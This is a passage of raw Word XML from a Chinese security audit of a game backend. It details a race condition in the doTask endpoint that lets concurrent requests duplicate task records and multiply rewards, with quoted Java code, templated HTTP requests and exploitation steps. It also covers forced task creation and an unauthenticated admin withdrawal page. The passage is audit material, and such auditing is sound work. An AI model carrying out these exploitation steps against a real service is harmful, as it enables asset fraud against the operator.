        </w:rPr>
        <w:t xml:space="preserve">向 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/task/doTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 发送携带目标 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的请求，系统将为当前用户强制创建该任务的参与记录；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若下游任务完成/奖励接口不二次校验任务合法性，则可直接触发奖励领取流程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="105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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通登录用户；同时需要有效的签名凭据（</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appSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，通常可从游戏客户端中提取）</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055"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TaskExecutionController.java.doTask → TaskExecutionService.java.doTask → UserTaskRecord.java.setStatus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audit_m222_919_doTask_ctrl-path6of7.md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：TaskExecutionService.java#doTask</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_50" w:id="50"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞49：TOCTOU 竞态——并发请求可创建重复任务记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="105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：任务记录创建 TOCTOU 竞态（Check-Then-Act 无锁保护导致重复记录）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="105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src/main/java/com/gameBack/mjservice/service/TaskExecutionService.java:doTask</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="105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业务逻辑漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="105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6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：普通登录用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1061"/>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doTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法采用经典的「先查后写」（Check-Then-Act）模式：先通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndTaskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 检查记录是否存在，若不存在则 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 新记录。该模式在 MySQL 默认 READ COMMITTED 隔离级别下存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>明显的 TOCTOU 竞态窗口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个并发事务 T1、T2 可同时通过"记录不存在"检查（两者均读到空结果），随后均执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，最终在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 上插入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>两条重复记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仅保证单事务内操作原子性，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无法阻止并发事务同时通过读检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">代码中没有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>INSERT IGNORE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>INSERT ... ON DUPLICATE KEY IGNORE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等互斥机制；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1065"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若数据库层面 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 无唯一约束（UNIQUE INDEX），重复记录将被成功写入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">后果：重复的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 若被下游任务完成/奖励发放逻辑遍历处理（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findAllByUserIdAndStatus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 查出多条），将导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同一任务奖励被重复发放</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，造成游戏资产（金币、钻石、道具等）的无限复制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1066"/>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攻击者以相同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并发发送多个请求，两个并发事务均在第 5 行通过检查，随后均在第 14 行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，若无数据库唯一约束托底，则两条记录均被持久化。</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TaskExecutionService.java</w:t>
              <w:br/>
              <w:t>@Transactional  // ← READ COMMITTED 默认隔离级别，无法阻止并发事务同时通过读检查</w:t>
              <w:br/>
              <w:t>public void doTask(Long userId, Long taskId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireSystemRunning();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireNotBanned(userId);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ← 竞态窗口开始：T1 和 T2 并发执行，均读到"记录不存在"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Optional&lt;UserTaskRecord&gt; byUserIdAndTaskId = userTaskRecordRepository.findByUserIdAndTaskId(userId, taskId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!byUserIdAndTaskId.isEmpty()) return;  // ← T1、T2 均通过此检查</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← 竞态窗口：此处无 SELECT FOR UPDATE、无分布式锁、无唯一约束保护</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserTaskRecord r = new UserTaskRecord();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setTaskId(taskId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setCurrentProgress(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setTargetProgress(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setStatus(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userTaskRecordRepository.save(r);  // ← T1 和 T2 各自插入一条，产生重复记录，漏洞点</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 xml:space="preserve">使用并发工具（如 Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）同时发送多个相同请求：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/api/task/doTask HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法 Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>appKey: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>nonce: &lt;不同的 nonce_1&gt;</w:t>
              <w:br/>
              <w:t>sign: &lt;对应签名&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"taskId": &lt;合法的 taskId&gt;}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/api/task/doTask HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;相同 Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>appKey: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>nonce: &lt;不同的 nonce_2&gt;</w:t>
              <w:br/>
              <w:t>sign: &lt;对应签名&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"taskId": &lt;相同 taskId&gt;}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>获取合法 Bearer Token 与签名凭据；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">针对同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用多线程/多协程同时发送 10～50 个并发 POST 请求；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">查询 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user_task_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表，验证是否存在多条相同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(user_id, task_id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的记录；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若下游任务完成接口（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/task/complete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）遍历该用户的所有状态为"完成"的任务记录并逐条发放奖励，则每条重复记录均触发一次奖励，实现奖励倍增。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="107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是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（需有效 Bearer Token）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通登录用户</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073"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TaskExecutionController.java.doTask → TaskExecutionService.java.doTask → UserTaskRecord.java.setStatus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audit_m222_919_doTask_ctrl-path6of7.md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：TestPageController.java#withdrawManage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_51" w:id="51"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞50：提现管理后台页面未经认证可公开访问</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="107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：提现管理后台页面未经认证可公开访问（Admin Page Auth Bypass via /test/ Whitelist）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="107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src/main/java/com/gameBack/mjservice/controller/TestPageController.java:withdrawManage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="107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：未授权访问 / 认证绕过</w:t>
      </w:r>
